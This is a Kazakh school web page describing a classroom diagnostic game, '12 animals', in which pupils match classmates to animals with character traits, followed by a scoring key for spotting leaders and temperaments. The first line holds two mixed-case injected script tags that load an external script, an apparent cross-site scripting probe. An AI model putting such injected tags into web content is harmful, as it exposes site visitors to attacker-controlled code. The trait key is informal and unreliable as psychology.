<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

09.11.2017

 

Диагностикалық ойын «12 жануар»

Мақсаты:

1)    Оқушыны оқушы көзімен тану;

2)    Оқушылардың қарым-қатынас

деңгейін анықтау;

3)    Сыныптағы беделді лидер, топ

басшысын табу.

 

Мүмкіндігінше оқушыларды жеке

парталарға отырғызу, жазу құралдарын даярлату.

Сұрақтар:

1)    Саған үй жануарлары ұнай ма?

2)    Олардың мінезін бақылап көрдің

бе?

3)    Хайуанаттар бағындағы жануарлар

мінезі қандай әсер туғызады?

4)    Тақтадағы жануарлар

мінез-қылығының сипаттамасымен келісесің бе?

5)    Жануарлар мінезі мен адам

мінезінде қандай ұқсастықтар бар?

 

Тапсырма:

Параққа өзінен басқа, сыныптағы

оқушылардың атын жазып, олардың тұсына мінез ұқсастығы сәйкес келетін аңның

номерін белгіле.

№1. Аю – ойы баяу, жайбасар.

№2. Қасқыр – ызақор, ашуланшақ.

№3. Түлкі – қу, айнымалы.

№4. Қоян – қорқақ, қобалжығыш.

№5. Арыстан – ақылды, айбатты.

№6. Ешкі – ұйымдастырғыш,

бастамашы (идеяшыл)

№7. Сиыр – момын, айтқанға

көнгіш.

№8. Қой – көпшіл.

№9. Жылқы – ақылды, ұқыпты.

№10. Есек – ақымақ, ерме.

№11. Мысық – жалқау, өзімшіл.

№12. Ит – адал, тұрақты, сенімді.

 

Кілті:

Дала жануары – 3-6 ұпай –

сырттату.

Үй жануары – 3-6 ұпай – жақын

тарту.

1)    Арыстан, ешкі 50-100% - басшы,

лидер.

2)    Жылқы, қасқыр 50-100% -

ашуланшақтық, ызақорлық, тәкаппарлық.

3)    Түлкі, мысық 50-100% - қу,

тапқыр, тұрақсыз.

 

Ескерту: 1. Бір-біріне не

жазғанын айтпау, көрсетпеу.

               2. Сыртқы келбетіне, ұқсастығына

қарап теңеу жасамау.

Просмотров: 449


Пікір қосу



Деректерді қолтаңбаға қосу